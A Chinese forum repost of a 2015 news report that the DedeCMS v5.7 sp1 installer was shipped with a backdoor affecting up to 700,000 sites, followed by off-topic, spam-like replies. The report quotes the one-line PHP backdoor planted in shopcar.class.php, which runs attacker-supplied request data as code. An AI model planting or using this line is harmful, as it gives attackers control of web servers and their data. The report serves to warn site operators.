12下一页
返回列表 发新帖

织梦CMS系统被曝植入后门 70万网站资料或泄露

459.3k 15
kjeittccdf 发表于 2015-3-30 15:29:14|湖北 | 查看全部 阅读模式
网易科技讯 3月22日消息,瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7  sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。) D6 _  ]/ a* h( N
据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。& t. ^" |% B8 f
安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。(易科)
# i. }7 t* w, Y# I  r

织梦dedeCMS中被植入的后门代码

织梦dedeCMS中被植入的后门代码

5 t, H- a+ @2 ?  Q
织梦CMS中被植入的后门代码

# @+ c' ~( W- A* p5 ]3 J- I延伸阅读:- d, s7 z1 u, x/ E( i

# c' n! G+ A/ N

回复|共 15 个

seazvyt 发表于 2016-1-18 18:21:39|波兰 | 查看全部
为了不让帖子沉得太快!!!为了人人知道这个~!! 我不是原创~!!但是我要把他发扬广大~!!!
wwzcdenleclv 发表于 2016-1-18 18:20:50|非洲 | 查看全部
今天统计好像出了问题
mwxny 发表于 2016-1-18 18:22:01|印度 | 查看全部
哈哈~` 你好有意思哦~
seazvyt 发表于 2016-1-18 18:20:56|法国 | 查看全部
来电来函..欢迎洽购...
wwzcdenleclv 发表于 2016-1-18 18:22:22|美国 | 查看全部
哎 天理何在啊??
wwdu926a 发表于 2016-1-25 18:04:15|日本 | 查看全部
有现实中的偶在这...不佩服.............佩服电影里的....
tohme 发表于 2016-1-25 18:04:53|美国 | 查看全部
我想骂我自己
buingeEvineus 发表于 2016-1-25 18:04:36|Reserved | 查看全部
真是天底下好事多多
wwdu926a 发表于 2016-1-25 18:04:08|法国 | 查看全部
k了我一个月的站,刚才site的时候
wwzcdenleclv 发表于 2016-1-25 18:04:11|美国 | 查看全部
这个站一周前刚刚有了点起色
wwzcdenleclv 发表于 2017-4-11 15:12:47|中国 | 查看全部
哥们,给我做个链接吧
Acropozelan 发表于 2017-4-11 15:06:28|意大利 | 查看全部
晚安 别让小嫁再郁闷了 -
seazvyt 发表于 2017-4-11 15:12:13|Reserved | 查看全部
看,刚说你眼神不好,你还就来劲了不是.
Mqokjdvq 发表于 2017-4-11 15:12:13|美国 | 查看全部
我不知道他说的是什么啊~~

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 得知互动-专注Ai与站长技术交流社区-Ai交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表